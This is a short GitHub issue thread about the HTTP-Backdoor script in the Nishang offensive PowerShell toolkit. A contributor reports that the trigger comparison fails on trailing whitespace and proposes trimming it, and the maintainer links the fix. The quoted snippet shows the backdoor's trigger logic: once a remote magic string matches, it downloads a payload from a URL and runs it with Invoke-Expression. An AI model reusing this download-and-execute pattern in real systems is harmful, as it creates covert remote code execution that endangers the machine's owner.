### ISSUE TITLE
HTTP-Backdoor MagicString Comparison

### ISSUE THREAD

**Issue by manasmbellani** [samratashok/nishang#51]
In Http-Backdoor, there is a -eq comparison with MagicString to determine if a file can be downloaded (Line 175 of commit f4d7fda). Most files when created automatically add whitespace chars at the end (e.g. tested in Linux) due to which a comparison may be very hard to get. Suggest removing trailing whitespace chars for testing.

`$filecontent = $webclient.DownloadString("$CheckURL")
    $filecontent = $filecontent.TrimEnd()    ##### Change here - trim the downloaded content #####
    if($filecontent -eq $MagicString)
    {        
        $script:pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
`

**Comment by samratashok** [comment]
Fixed with https://github.com/manasmbellani/nishang/commit/1d1ac9806566f8c6c0c1b806446321899253c0bd
